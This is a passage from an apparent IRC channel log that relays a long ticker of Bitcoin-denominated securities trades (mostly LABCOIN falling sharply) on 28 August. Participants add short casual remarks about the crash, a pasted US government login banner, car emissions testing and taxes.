04:28:48 [BTCTC] [LABCOIN] 8586 @ 0.00331 = 28.4197 BTC [-] Aug 28 04:28:50 [BTCTC] [LABCOIN] 100 @ 0.003309 = 0.3309 BTC [-] Aug 28 04:28:51 [BTCTC] [LABCOIN] 100 @ 0.003309 = 0.3309 BTC [-] Aug 28 04:28:52 [BTCTC] [LABCOIN] 18 @ 0.003305 = 0.0595 BTC [-] Aug 28 04:28:53 [BTCTC] [LABCOIN] 1 @ 0.0033 BTC [-] Aug 28 04:28:54 [BTCTC] [LABCOIN] 600 @ 0.0033 = 1.98 BTC [-] Aug 28 04:29:20 [BTCTC] [LABCOIN] 1000 @ 0.0033 = 3.3 BTC [-] Aug 28 04:29:22 [BTCTC] [LABCOIN] 600 @ 0.003285 = 1.971 BTC [-] Aug 28 04:29:23 [BTCTC] [LABCOIN] 100 @ 0.003278 = 0.3278 BTC [-] Aug 28 04:29:25 [BTCTC] [LABCOIN] 3490 @ 0.003251 = 11.346 BTC [-] Aug 28 04:29:26 [BTCTC] [LABCOIN] 3070 @ 0.00325 = 9.9775 BTC [-] Aug 28 04:30:37 [BTCTC] [ASICMINER-PT] 1 @ 2.451 BTC [-] Aug 28 04:30:39 [BTCTC] [ASICMINER-PT] 1 @ 2.451 BTC [-] Aug 28 04:31:12 [BTCTC] [LABCOIN] 10 @ 0.003241 = 0.0324 BTC [-] Aug 28 04:31:25 [BTCTC] [ASICMINER-PT] 1 @ 2.45 BTC [-] Aug 28 04:31:27 [BTCTC] [ASICMINER-PT] 9 @ 2.42 = 21.78 BTC [-] Aug 28 04:31:48 [BTCTC] [LABCOIN] 4827 @ 0.003241 = 15.6443 BTC [-] Aug 28 04:32:10 [BTCTC] [ASICMINER-PT] 1 @ 2.45 BTC [+] Aug 28 04:32:25 [BTCTC] [ASICMINER-PT] 1 @ 2.421 BTC [-] Aug 28 04:32:49 [BTCTC] [LABCOIN] 8626 @ 0.003241 = 27.9569 BTC [-] Aug 28 04:33:02 [BTCTC] [ASICMINER-PT] 1 @ 2.421 BTC [-] Aug 28 04:34:14 [BTCTC] [ASICMINER-PT] 1 @ 2.405 BTC [-] Aug 28 04:34:32 to the ground! Aug 28 04:36:27 like a b0$$ Aug 28 04:36:46 [BTCTC] [LABCOIN] 70 @ 0.003241 = 0.2269 BTC [-] Aug 28 04:36:48 [BTCTC] [LABCOIN] 100 @ 0.003211 = 0.3211 BTC [-] Aug 28 04:36:49 [BTCTC] [LABCOIN] 1 @ 0.0032 BTC [-] Aug 28 04:36:50 [BTCTC] [LABCOIN] 800 @ 0.0032 = 2.56 BTC [-] Aug 28 04:36:52 [BTCTC] [LABCOIN] 3 @ 0.00319 = 0.0096 BTC [-] Aug 28 04:39:27 [HAVELOCK] [AM100] 88 @ 0.0231 = 2.0328 BTC [+] Aug 28 04:39:30 [BTCTC] [TAT.ASICMINER] 50 @ 0.02301 = 1.1505 BTC [-] Aug 28 04:39:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.023 BTC [-] Aug 28 04:39:31 [BTCTC] [TAT.ASICMINER] 20 @ 0.023 = 0.46 BTC [-] Aug 28 04:39:32 [BTCTC] [TAT.ASICMINER] 60 @ 0.02276 = 1.3656 BTC [-] Aug 28 04:39:33 [BTCTC] [TAT.ASICMINER] 18 @ 0.02275 = 0.4095 BTC [-] Aug 28 04:40:50 [BTCTC] [LABCOIN] 1 @ 0.003185 BTC [-] Aug 28 04:40:52 [BTCTC] [LABCOIN] 299 @ 0.003141 = 0.9392 BTC [-] Aug 28 04:41:16 [BTCTC] [LABCOIN] 1 @ 0.003141 BTC [-] Aug 28 04:41:18 [BTCTC] [LABCOIN] 473 @ 0.00314 = 1.4852 BTC [-] Aug 28 04:41:34 [BTCTC] [BASIC-MINING] 3 @ 0.2105 = 0.6315 BTC [-] Aug 28 04:41:35 [BTCTC] [BASIC-MINING] 1 @ 0.2105 BTC [-] Aug 28 04:41:55 [BTCTC] [LABCOIN] 4 @ 0.003142 = 0.0126 BTC [+] Aug 28 04:41:57 [BTCTC] [LABCOIN] 200 @ 0.0031 = 0.62 BTC [-] Aug 28 04:42:13 [BTCTC] [LABCOIN] 5 @ 0.00307 = 0.0154 BTC [-] Aug 28 04:42:14 [BTCTC] [LABCOIN] 2251 @ 0.003062 = 6.8926 BTC [-] Aug 28 04:42:52 [BTCTC] [LABCOIN] 1540 @ 0.003062 = 4.7155 BTC [-] Aug 28 04:43:06 [BTCTC] [LABCOIN] 8959 @ 0.003062 = 27.4325 BTC [-] Aug 28 04:43:17 [BTCTC] [ACTIVEMINING] 752 @ 0.005021 = 3.7758 BTC [-] Aug 28 04:43:19 [BTCTC] [ACTIVEMINING] 20 @ 0.005021 = 0.1004 BTC [-] Aug 28 04:43:36 [BTCTC] [LABCOIN] 6119 @ 0.003061 = 18.7303 BTC [-] Aug 28 04:43:43 [BTCTC] [LABCOIN] 681 @ 0.003061 = 2.0845 BTC [-] Aug 28 04:43:44 [BTCTC] [ACTIVEMINING] 275 @ 0.00502 = 1.3805 BTC [-] Aug 28 04:43:47 [BTCTC] [ACTIVEMINING] 1000 @ 0.00502 = 5.02 BTC [-] Aug 28 04:44:05 [BTCTC] [LABCOIN] 285 @ 0.00306 = 0.8721 BTC [-] Aug 28 04:44:07 [BTCTC] [LABCOIN] 715 @ 0.00306 = 2.1879 BTC [-] Aug 28 04:44:08 [BTCTC] [LABCOIN] 3000 @ 0.003055 = 9.165 BTC [-] Aug 28 04:44:32 [BTCTC] [ACTIVEMINING] 550 @ 0.005014 = 2.7577 BTC [-] Aug 28 04:44:33 [BTCTC] [LABCOIN] 100 @ 0.003061 = 0.3061 BTC [+] Aug 28 04:44:45 [BTCTC] [LABCOIN] 1300 @ 0.00307 = 3.991 BTC [+] Aug 28 04:44:46 [BTCTC] [LABCOIN] 1050 @ 0.003061 = 3.2141 BTC [-] Aug 28 04:44:48 [BTCTC] [LABCOIN] 100 @ 0.003012 = 0.3012 BTC [-] Aug 28 04:44:49 [BTCTC] [LABCOIN] 100 @ 0.003012 = 0.3012 BTC [-] Aug 28 04:44:50 [BTCTC] [LABCOIN] 550 @ 0.003011 = 1.6561 BTC [-] Aug 28 04:44:51 [BTCTC] [LABCOIN] 219 @ 0.00301 = 0.6592 BTC [-] Aug 28 04:44:53 [BTCTC] [LABCOIN] 4504 @ 0.00301 = 13.557 BTC [-] Aug 28 04:45:24 lol theswede catching on that it looks really lolzy to have his scamset trade flat while am burns to the ground ? Aug 28 04:45:29 [BTCTC] [LABCOIN] 900 @ 0.003012 = 2.7108 BTC [+] Aug 28 04:45:42 [BTCTC] [LABCOIN] 150 @ 0.00301 = 0.4515 BTC [-] Aug 28 04:45:53 [BTCTC] [LABCOIN] 2000 @ 0.00301 = 6.02 BTC [-] Aug 28 04:46:05 [BTCTC] [LABCOIN] 40 @ 0.003012 = 0.1205 BTC [+] Aug 28 04:46:17 [BTCTC] [LABCOIN] 130 @ 0.00301 = 0.3913 BTC [-] Aug 28 04:46:18 [BTCTC] [ASICMINER-PT] 2 @ 2.411 = 4.822 BTC [+] Aug 28 04:46:20 [BTCTC] [ASICMINER-PT] 8 @ 2.41 = 19.28 BTC [-] Aug 28 04:46:21 [BTCTC] [LABCOIN] 41 @ 0.00301 = 0.1234 BTC [-] Aug 28 04:46:35 [BTCTC] [ACTIVEMINING] 1000 @ 0.005014 = 5.014 BTC [-] Aug 28 04:47:24 [BTCTC] [LABCOIN] 830 @ 0.00301 = 2.4983 BTC [-] Aug 28 04:47:39 [BTCTC] [ACTIVEMINING] 924 @ 0.005014 = 4.6329 BTC [-] Aug 28 04:47:47 [BTCTC] [LABCOIN] 415 @ 0.00301 = 1.2492 BTC [-] Aug 28 04:47:49 [BTCTC] [LABCOIN] 10 @ 0.003007 = 0.0301 BTC [-] Aug 28 04:47:49 [BTCTC] [LABCOIN] 1 @ 0.003 BTC [-] Aug 28 04:47:50 [BTCTC] [LABCOIN] 1 @ 0.003 BTC [-] Aug 28 04:47:51 [BTCTC] [LABCOIN] 200 @ 0.003 = 0.6 BTC [-] Aug 28 04:47:53 [BTCTC] [LABCOIN] 2250 @ 0.002997 = 6.7433 BTC [-] Aug 28 04:47:54 [BTCTC] [LABCOIN] 50 @ 0.002997 = 0.1499 BTC [-] Aug 28 04:47:55 [BTCTC] [LABCOIN] 1 @ 0.002958 BTC [-] Aug 28 04:47:56 [BTCTC] [LABCOIN] 5000 @ 0.00291 = 14.55 BTC [-] Aug 28 04:47:57 [BTCTC] [LABCOIN] 450 @ 0.0029 = 1.305 BTC [-] Aug 28 04:47:58 [BTCTC] [LABCOIN] 1 @ 0.0029 BTC [-] Aug 28 04:47:59 [BTCTC] [LABCOIN] 1 @ 0.0029 BTC [-] Aug 28 04:48:00 [BTCTC] [LABCOIN] 8 @ 0.002892 = 0.0231 BTC [-] Aug 28 04:48:02 [BTCTC] [LABCOIN] 1612 @ 0.00289 = 4.6587 BTC [-] Aug 28 04:48:06 [BTCTC] [ASICMINER-PT] 1 @ 2.439 BTC [+] Aug 28 04:48:07 [BTCTC] [ASICMINER-PT] 1 @ 2.438 BTC [-] Aug 28 04:48:09 [BTCTC] [ASICMINER-PT] 2 @ 2.41 = 4.82 BTC [-] Aug 28 04:48:10 [BTCTC] [ASICMINER-PT] 1 @ 2.402 BTC [-] Aug 28 04:48:11 [BTCTC] [ASICMINER-PT] 2 @ 2.4 = 4.8 BTC [-] Aug 28 04:48:11 why do anybody even care Aug 28 04:48:18 [BTCTC] [LABCOIN] 2 @ 0.00289 = 0.0058 BTC [-] Aug 28 04:48:19 [HAVELOCK] [XBOND] 10 @ 0.00138599 = 0.0139 BTC [+] Aug 28 04:48:32 nothing makes sense anymore Aug 28 04:48:40 I should have sold everything to buy XBOND Aug 28 04:48:46 lmao Aug 28 04:49:06 [BTCTC] [LABCOIN] 800 @ 0.0029 = 2.32 BTC [+] Aug 28 04:49:31 [BTCTC] [LABCOIN] 500 @ 0.00285 = 1.425 BTC [-] Aug 28 04:49:32 [BTCTC] [LABCOIN] 497 @ 0.002826 = 1.4045 BTC [-] Aug 28 04:49:33 [BTCTC] [LABCOIN] 1 @ 0.0028 BTC [-] Aug 28 04:49:34 [BTCTC] [LABCOIN] 100 @ 0.0028 = 0.28 BTC [-] Aug 28 04:49:36 [BTCTC] [LABCOIN] 1 @ 0.0028 BTC [-] Aug 28 04:49:37 [BTCTC] [LABCOIN] 7 @ 0.0028 = 0.0196 BTC [-] Aug 28 04:49:38 [BTCTC] [LABCOIN] 1000 @ 0.00279 = 2.79 BTC [-] Aug 28 04:49:39 [BTCTC] [LABCOIN] 5000 @ 0.00279 = 13.95 BTC [-] Aug 28 04:49:59 Eh, indeed, everything is... kind of crazy right now Aug 28 04:50:04 [BTCTC] [LABCOIN] 4 @ 0.002766 = 0.0111 BTC [-] Aug 28 04:50:05 [BTCTC] [LABCOIN] 1 @ 0.00275 BTC [-] Aug 28 04:50:07 [BTCTC] [LABCOIN] 200 @ 0.002733 = 0.5466 BTC [-] Aug 28 04:50:08 [BTCTC] [LABCOIN] 100 @ 0.002732 = 0.2732 BTC [-] Aug 28 04:50:08 [BTCTC] [LABCOIN] 1200 @ 0.00273 = 3.276 BTC [-] Aug 28 04:50:09 non-sensical Aug 28 04:50:30 [BTCTC] [LABCOIN] 40 @ 0.002712 = 0.1085 BTC [-] Aug 28 04:50:37 [BTCTC] [LTC-ATF.B2] 41 @ 0.01042 = 0.4272 BTC [-] Aug 28 04:50:46 Which is why I got a good bunch of BTC not tied anywhere Aug 28 04:50:54 No place to allocate Aug 28 04:51:36 [HAVELOCK] [LABCO] 10 @ 0.0029 = 0.029 BTC [-] Aug 28 04:51:39 [BTCTC] [LABCOIN] 1 @ 0.0027 BTC [-] Aug 28 04:51:40 [HAVELOCK] [LABCO] 197 @ 0.0028702 = 0.5654 BTC [-] Aug 28 04:51:42 [BTCTC] [LABCOIN] 200 @ 0.0027 = 0.54 BTC [-] Aug 28 04:51:46 [BTCTC] [LABCOIN] 200 @ 0.00265 = 0.53 BTC [-] Aug 28 04:51:49 [BTCTC] [LABCOIN] 20 @ 0.0027 = 0.054 BTC [+] Aug 28 04:52:00 [BTCTC] [LABCOIN] 77 @ 0.00265 = 0.2041 BTC [-] Aug 28 04:52:01 [BTCTC] [LABCOIN] 80 @ 0.002601 = 0.2081 BTC [-] Aug 28 04:52:02 [BTCTC] [LABCOIN] 200 @ 0.0026 = 0.52 BTC [-] Aug 28 04:52:03 [BTCTC] [LABCOIN] 60 @ 0.0026 = 0.156 BTC [-] Aug 28 04:52:05 [BTCTC] [LABCOIN] 100 @ 0.0026 = 0.26 BTC [-] Aug 28 04:52:06 [BTCTC] [LABCOIN] 300 @ 0.0026 = 0.78 BTC [-] Aug 28 04:52:07 [BTCTC] [LABCOIN] 300 @ 0.002576 = 0.7728 BTC [-] Aug 28 04:52:08 [BTCTC] [LABCOIN] 6000 @ 0.002576 = 15.456 BTC [-] Aug 28 04:52:09 [BTCTC] [LABCOIN] 1556 @ 0.002575 = 4.0067 BTC [-] Aug 28 04:52:11 [BTCTC] [LABCOIN] 548 @ 0.002575 = 1.4111 BTC [-] Aug 28 04:52:12 [BTCTC] [LABCOIN] 2500 @ 0.002575 = 6.4375 BTC [-] Aug 28 04:52:13 [BTCTC] [LABCOIN] 522 @ 0.002543 = 1.3274 BTC [-] Aug 28 04:52:13 [BTCTC] [LABCOIN] 10 @ 0.002507 = 0.0251 BTC [-] Aug 28 04:52:14 [BTCTC] [LABCOIN] 25 @ 0.002507 = 0.0627 BTC [-] Aug 28 04:52:16 [BTCTC] [LABCOIN] 395 @ 0.002501 = 0.9879 BTC [-] Aug 28 04:52:17 [BTCTC] [LABCOIN] 74 @ 0.002651 = 0.1962 BTC [+] Aug 28 04:52:19 [BTCTC] [LABCOIN] 4520 @ 0.002503 = 11.3136 BTC [-] Aug 28 04:52:20 [BTCTC] [LABCOIN] 405 @ 0.002501 = 1.0129 BTC [-] Aug 28 04:52:21 [BTCTC] [LABCOIN] 4000 @ 0.0025 = 10 BTC [-] Aug 28 04:52:22 [BTCTC] [LABCOIN] 6972 @ 0.0025 = 17.43 BTC [-] Aug 28 04:52:23 [BTCTC] [LABCOIN] 1250 @ 0.0025 = 3.125 BTC [-] Aug 28 04:52:24 [BTCTC] [LABCOIN] 2779 @ 0.0025 = 6.9475 BTC [-] Aug 28 04:52:53 [BTCTC] [ACTIVEMINING] 1000 @ 0.005015 = 5.015 BTC [+] Aug 28 04:53:04 [BTCTC] [ASICMINER-PT] 1 @ 2.485 BTC [+] Aug 28 04:53:05 [BTCTC] [ASICMINER-PT] 1 @ 2.486 BTC [+] Aug 28 04:53:06 [BTCTC] [ASICMINER-PT] 1 @ 2.489 BTC [+] Aug 28 04:53:07 [BTCTC] [ASICMINER-PT] 7 @ 2.49 = 17.43 BTC [+] Aug 28 04:53:09 [BTCTC] [LABCOIN] 1453 @ 0.0025 = 3.6325 BTC [-] Aug 28 04:53:12 [BTCTC] [LABCOIN] 3268 @ 0.0025 = 8.17 BTC [-] Aug 28 04:53:13 [BTCTC] [LABCOIN] 5000 @ 0.00249 = 12.45 BTC [-] Aug 28 04:53:15 [BTCTC] [LABCOIN] 500 @ 0.002452 = 1.226 BTC [-] Aug 28 04:53:16 [BTCTC] [LABCOIN] 175 @ 0.002451 = 0.4289 BTC [-] Aug 28 04:53:17 [BTCTC] [LABCOIN] 1000 @ 0.002401 = 2.401 BTC [-] Aug 28 04:53:17 [BTCTC] [LABCOIN] 5000 @ 0.0024 = 12 BTC [-] Aug 28 04:53:18 [BTCTC] [LABCOIN] 500 @ 0.0024 = 1.2 BTC [-] Aug 28 04:53:19 [BTCTC] [LABCOIN] 2500 @ 0.002395 = 5.9875 BTC [-] Aug 28 04:53:21 [BTCTC] [LABCOIN] 1500 @ 0.002301 = 3.4515 BTC [-] Aug 28 04:53:22 [BTCTC] [LABCOIN] 550 @ 0.002289 = 1.259 BTC [-] Aug 28 04:53:24 [BTCTC] [LABCOIN] 300 @ 0.00228 = 0.684 BTC [-] Aug 28 04:53:25 [BTCTC] [LABCOIN] 1500 @ 0.00221 = 3.315 BTC [-] Aug 28 04:53:26 [BTCTC] [LABCOIN] 450 @ 0.0022 = 0.99 BTC [-] Aug 28 04:53:27 [BTCTC] [LABCOIN] 5000 @ 0.00216 = 10.8 BTC [-] Aug 28 04:53:29 [BTCTC] [LABCOIN] 5000 @ 0.00215 = 10.75 BTC [-] Aug 28 04:53:30 [BTCTC] [LABCOIN] 4718 @ 0.002113 = 9.9691 BTC [-] Aug 28 04:53:30 [BTCTC] [LABCOIN] 2500 @ 0.00211 = 5.275 BTC [-] Aug 28 04:53:31 [BTCTC] [LABCOIN] 100 @ 0.002101 = 0.2101 BTC [-] Aug 28 04:53:32 [BTCTC] [LABCOIN] 48 @ 0.0021 = 0.1008 BTC [-] Aug 28 04:53:33 [BTCTC] [LABCOIN] 1000 @ 0.0021 = 2.1 BTC [-] Aug 28 04:53:34 [BTCTC] [LABCOIN] 3000 @ 0.0021 = 6.3 BTC [-] Aug 28 04:53:35 [BTCTC] [LABCOIN] 450 @ 0.0021 = 0.945 BTC [-] Aug 28 04:53:37 [BTCTC] [LABCOIN] 15384 @ 0.0021 = 32.3064 BTC [-] Aug 28 04:53:38 [BTCTC] [LABCOIN] 255 @ 0.0023 = 0.5865 BTC [+] Aug 28 04:54:11 Namworld that's a common problem. Aug 28 04:54:20 [BTCTC] [ACTIVEMINING] 300 @ 0.005015 = 1.5045 BTC [+] Aug 28 04:54:33 [BTCTC] [LABCOIN] 30 @ 0.002301 = 0.069 BTC [+] Aug 28 04:54:42 failed markets be failed markets. Aug 28 04:54:44 [BTCTC] [LABCOIN] 5970 @ 0.002301 = 13.737 BTC [+] Aug 28 04:54:46 [BTCTC] [LABCOIN] 25 @ 0.0023 = 0.0575 BTC [-] Aug 28 04:54:47 [BTCTC] [LABCOIN] 1000 @ 0.0022 = 2.2 BTC [-] Aug 28 04:54:48 [BTCTC] [LABCOIN] 3005 @ 0.0021 = 6.3105 BTC [-] Aug 28 04:54:50 [BTCTC] [LABCOIN] 1564 @ 0.002301 = 3.5988 BTC [+] Aug 28 04:55:10 [BTCTC] [LABCOIN] 3436 @ 0.002301 = 7.9062 BTC [+] Aug 28 04:55:23 [BTCTC] [LABCOIN] 2559 @ 0.0023 = 5.8857 BTC [-] Aug 28 04:55:35 [BTCTC] [TAT.ASICMINER] 9 @ 0.02448 = 0.2203 BTC [+] Aug 28 04:55:52 [BTCTC] [LABCOIN] 12480 @ 0.00233 = 29.0784 BTC [+] Aug 28 04:55:53 [BTCTC] [ASICMINER-PT] 10 @ 2.41 = 24.1 BTC [-] Aug 28 04:56:04 [BTCTC] [TAT.ASICMINER] 2 @ 0.02448 = 0.049 BTC [+] Aug 28 04:56:07 [HAVELOCK] [AM100] 6 @ 0.02469999 = 0.1482 BTC [+] Aug 28 04:56:16 [BTCTC] [ASICMINER-PT] 1 @ 2.409 BTC [-] Aug 28 04:56:17 [BTCTC] [ASICMINER-PT] 3 @ 2.41 = 7.23 BTC [+] Aug 28 04:56:20 [HAVELOCK] [AM100] 10 @ 0.0247 = 0.247 BTC [+] Aug 28 04:56:31 [HAVELOCK] [AM100] 15 @ 0.02475 = 0.3713 BTC [+] Aug 28 04:57:16 [HAVELOCK] [AM100] 29 @ 0.0249 = 0.7221 BTC [+] Aug 28 04:57:37 [BTCTC] [LABCOIN] 132 @ 0.002542 = 0.3355 BTC [+] Aug 28 04:57:38 [BTCTC] [LABCOIN] 448 @ 0.002543 = 1.1393 BTC [+] Aug 28 04:57:49 [BTCTC] [LABCOIN] 80 @ 0.002543 = 0.2034 BTC [+] Aug 28 04:57:53 [BTCTC] [DMS.MINING] 110 @ 0.003346 = 0.3681 BTC [-] Aug 28 04:58:09 [BTCTC] [ASICMINER-PT] 1 @ 2.401 BTC [-] Aug 28 04:58:10 [BTCTC] [ASICMINER-PT] 1 @ 2.4 BTC [-] Aug 28 04:58:29 [BTCTC] [LABCOIN] 1 @ 0.0024 BTC [-] Aug 28 04:58:30 [BTCTC] [LABCOIN] 599 @ 0.00236 = 1.4136 BTC [-] Aug 28 04:58:32 [HAVELOCK] [AM100] 1 @ 0.0249 BTC [+] Aug 28 04:58:42 [BTCTC] [ASICMINER-PT] 4 @ 2.41 = 9.64 BTC [+] Aug 28 04:58:43 [BTCTC] [BASIC-MINING] 1 @ 0.2179 BTC [+] Aug 28 04:59:20 [BTCTC] [MININGCO.ETF] 1 @ 0.1199 BTC [+] Aug 28 05:00:01 [BTCTC] [LABCOIN] 6000 @ 0.003 = 18 BTC [+] Aug 28 05:00:04 [BTCTC] [TAT.ASICMINER] 9 @ 0.02448 = 0.2203 BTC [+] Aug 28 05:00:05 [BTCTC] [TAT.ASICMINER] 48 @ 0.02449 = 1.1755 BTC [+] Aug 28 05:00:06 [BTCTC] [TAT.ASICMINER] 8 @ 0.02489 = 0.1991 BTC [+] Aug 28 05:00:07 [BTCTC] [TAT.ASICMINER] 13 @ 0.02489 = 0.3236 BTC [+] Aug 28 05:00:40 [BTCTC] [LABCOIN] 830 @ 0.003 = 2.49 BTC [+] Aug 28 05:00:45 [BTCTC] [LABCOIN] 5000 @ 0.0011 = 5.5 BTC [-] Aug 28 05:00:56 [BTCTC] [BASIC-MINING] 9 @ 0.2105 = 1.8945 BTC [-] Aug 28 05:01:12 [BTCTC] [ASICMINER-PT] 3 @ 2.41 = 7.23 BTC [+] Aug 28 05:01:20 [MPEX] [S.MPOE] 6553 @ 0.0008786 = 5.7575 BTC [+] Aug 28 05:01:37 [BTCTC] [LABCOIN] 2200 @ 0.003 = 6.6 BTC [+] Aug 28 05:02:22 [BTCTC] [TAT.ASICMINER] 4 @ 0.02489 = 0.0996 BTC [+] Aug 28 05:02:52 [BTCTC] [LABCOIN] 150 @ 0.003 = 0.45 BTC [+] Aug 28 05:03:08 [BTCTC] [LABCOIN] 10 @ 0.0032 = 0.032 BTC [+] Aug 28 05:03:26 [BTCTC] [LABCOIN] 557 @ 0.00289 = 1.6097 BTC [-] Aug 28 05:03:45 [BTCTC] [DMS.PURCHASE] 2 @ 0.01601 = 0.032 BTC [+] Aug 28 05:03:48 [BTCTC] [LABCOIN] 501 @ 0.002826 = 1.4158 BTC [-] Aug 28 05:04:05 [BTCTC] [LABCOIN] 380 @ 0.002826 = 1.0739 BTC [-] Aug 28 05:04:20 [BTCTC] [ASICMINER-PT] 3 @ 2.49 = 7.47 BTC [+] Aug 28 05:04:35 [BTCTC] [LABCOIN] 121 @ 0.002826 = 0.3419 BTC [-] Aug 28 05:04:36 [BTCTC] [HOSTED-MINING] 40 @ 0.002795 = 0.1118 BTC [+] Aug 28 05:04:52 [BTCTC] [LABCOIN] 2900 @ 0.002781 = 8.0649 BTC [-] Aug 28 05:04:54 [BTCTC] [LABCOIN] 2100 @ 0.00278 = 5.838 BTC [-] Aug 28 05:05:25 [BTCTC] [LABCOIN] 50 @ 0.002826 = 0.1413 BTC [+] Aug 28 05:05:25 [BTCTC] [LABCOIN] 60 @ 0.00278 = 0.1668 BTC [-] Aug 28 05:05:27 [BTCTC] [LABCOIN] 1000 @ 0.003 = 3 BTC [+] Aug 28 05:06:00 [BTCTC] [ACTIVEMINING] 250 @ 0.005297 = 1.3243 BTC [+] Aug 28 05:06:20 [BTCTC] [LABCOIN] 250 @ 0.002782 = 0.6955 BTC [-] Aug 28 05:06:37 [BTCTC] [LABCOIN] 2000 @ 0.002999 = 5.998 BTC [+] Aug 28 05:06:38 [BTCTC] [LABCOIN] 315 @ 0.002999 = 0.9447 BTC [+] Aug 28 05:06:50 THIS U.S. GOVERNMENT SYSTEM IS FOR AUTHORIZED USE ONLY! Aug 28 05:06:50 Use of this system constitutes consent to monitoring, interception, recording, reading, copying or capturing by authorized personnel of all activities. There is no right to privacy in this system. Unauthorized use of this system is prohibited and subject to criminal and civil penalties, including all penalties applicable to willful unauthorized access (UNAX) or inspection of taxpayer records (under 18 U.S.C. 1030 and 26 U.S.C. 7213A and 26 Aug 28 05:06:50 U.S.C. 7431). Aug 28 05:06:51 herp. Aug 28 05:06:56 [BTCTC] [ACTIVEMINING] 4 @ 0.005016 = 0.0201 BTC [-] Aug 28 05:06:57 [BTCTC] [ACTIVEMINING] 50 @ 0.005015 = 0.2508 BTC [-] Aug 28 05:07:09 aids Aug 28 05:07:11 [BTCTC] [LABCOIN] 2527 @ 0.003 = 7.581 BTC [+] Aug 28 05:07:27 [BTCTC] [TAT.ASICMINER] 6 @ 0.02489 = 0.1493 BTC [+] Aug 28 05:07:29 stop hacking the nsa Aug 28 05:07:56 [BTCTC] [LABCOIN] 2033 @ 0.003 = 6.099 BTC [+] Aug 28 05:08:11 [BTCTC] [LABCOIN] 467 @ 0.003 = 1.401 BTC [+] Aug 28 05:08:25 [BTCTC] [TAT.ASICMINER] 4 @ 0.02487 = 0.0995 BTC [-] Aug 28 05:08:44 [BTCTC] [LABCOIN] 80 @ 0.002999 = 0.2399 BTC [-] Aug 28 05:08:47 [BTCTC] [TAT.ASICMINER] 10 @ 0.02487 = 0.2487 BTC [-] Aug 28 05:08:55 [BTCTC] [TAT.ASICMINER] 6 @ 0.02487 = 0.1492 BTC [-] Aug 28 05:08:58 [BTCTC] [LABCOIN] 5 @ 0.002999 = 0.015 BTC [-] Aug 28 05:08:59 [BTCTC] [LABCOIN] 1084 @ 0.003 = 3.252 BTC [+] Aug 28 05:09:01 [BTCTC] [LABCOIN] 20 @ 0.003 = 0.06 BTC [+] Aug 28 05:09:29 [BTCTC] [TAT.ASICMINER] 10 @ 0.02488 = 0.2488 BTC [+] Aug 28 05:09:30 [BTCTC] [ACTIVEMINING] 950 @ 0.005014 = 4.7633 BTC [-] Aug 28 05:09:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.02488 BTC [+] Aug 28 05:09:54 [BTCTC] [LABCOIN] 85 @ 0.003096 = 0.2632 BTC [+] Aug 28 05:10:10 [BTCTC] [LABCOIN] 1000 @ 0.003099 = 3.099 BTC [+] Aug 28 05:10:12 [BTCTC] [LABCOIN] 4000 @ 0.0031 = 12.4 BTC [+] Aug 28 05:10:24 [BTCTC] [TAT.ASICMINER] 4 @ 0.02488 = 0.0995 BTC [+] Aug 28 05:11:35 [BTCTC] [TAT.ASICMINER] 5 @ 0.02488 = 0.1244 BTC [+] Aug 28 05:11:39 [MPEX] [S.MPOE] 4650 @ 0.0008786 = 4.0855 BTC [+] Aug 28 05:12:11 [BTCTC] [TAT.ASICMINER] 2 @ 0.02489 = 0.0498 BTC [+] Aug 28 05:13:21 [BTCTC] [LABCOIN] 85 @ 0.003101 = 0.2636 BTC [+] Aug 28 05:13:22 [BTCTC] [LABCOIN] 15 @ 0.0031 = 0.0465 BTC [-] Aug 28 05:13:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.02489 BTC [+] Aug 28 05:15:12 [BTCTC] [LABCOIN] 50 @ 0.00314 = 0.157 BTC [+] Aug 28 05:16:26 [BTCTC] [LABCOIN] 85 @ 0.003097 = 0.2632 BTC [-] Aug 28 05:16:26 [BTCTC] [LABCOIN] 65 @ 0.003098 = 0.2014 BTC [+] Aug 28 05:17:02 [BTCTC] [LABCOIN] 85 @ 0.003001 = 0.2551 BTC [-] Aug 28 05:17:17 [BTCTC] [LABCOIN] 1 @ 0.003001 BTC [-] Aug 28 05:17:29 [HAVELOCK] [LABCO] 12 @ 0.0028702 = 0.0344 BTC [-] Aug 28 05:17:33 [BTCTC] [LABCOIN] 14 @ 0.003001 = 0.042 BTC [-] Aug 28 05:18:44 [BTCTC] [LABCOIN] 500 @ 0.003098 = 1.549 BTC [+] Aug 28 05:18:51 Well shit I got to get my emissions done tomorrow Aug 28 05:20:23 [BTCTC] [LABCOIN] 11 @ 0.003119 = 0.0343 BTC [+] Aug 28 05:21:15 [BTCTC] [LABCOIN] 85 @ 0.00311 = 0.2644 BTC [-] Aug 28 05:23:14 [BTCTC] [LABCOIN] 1000 @ 0.003088 = 3.088 BTC [-] Aug 28 05:23:15 what are you emitting Aug 28 05:23:28 [BTCTC] [LABCOIN] 1260 @ 0.003098 = 3.9035 BTC [+] Aug 28 05:23:48 In my state, you have to get your emissions tested for you car once a year, every year before your birthday month Aug 28 05:23:49 [BTCTC] [LABCOIN] 2000 @ 0.003098 = 6.196 BTC [+] Aug 28 05:23:52 [BTCTC] [TAT.ASICMINER] 6 @ 0.02488 = 0.1493 BTC [-] Aug 28 05:23:52 [BTCTC] [TAT.ASICMINER] 6 @ 0.02489 = 0.1493 BTC [+] Aug 28 05:23:53 And well, mine is in sept Aug 28 05:23:53 [BTCTC] [TAT.ASICMINER] 99 @ 0.0249 = 2.4651 BTC [+] Aug 28 05:23:59 fuck that Aug 28 05:24:02 [BTCTC] [LABCOIN] 1 @ 0.003021 BTC [-] Aug 28 05:24:03 [BTCTC] [LABCOIN] 1 @ 0.00302 BTC [-] Aug 28 05:24:05 [BTCTC] [LABCOIN] 7 @ 0.00301 = 0.0211 BTC [-] Aug 28 05:24:06 [BTCTC] [LABCOIN] 200 @ 0.003 = 0.6 BTC [-] Aug 28 05:24:07 [BTCTC] [LABCOIN] 5099 @ 0.00297 = 15.144 BTC [-] Aug 28 05:24:20 [BTCTC] [LABCOIN] 2 @ 0.003097 = 0.0062 BTC [+] Aug 28 05:24:24 Yeah then you get to pay a tag fee and an ad volorum tax Aug 28 05:24:41 It's like, hey happy birthday, here's fuck ton of taxes for you Aug 28 05:24:41 [HAVELOCK] [SDSTM] 5 @ 0.0036 = 0.018 BTC [-] Aug 28 05:24:43 [HAVELOCK] [SDSTM] 5 @ 0.0031 = 0.0155 BTC [-] Aug 28 05:24:45 [HAVELOCK] [SDSTM] 45 @ 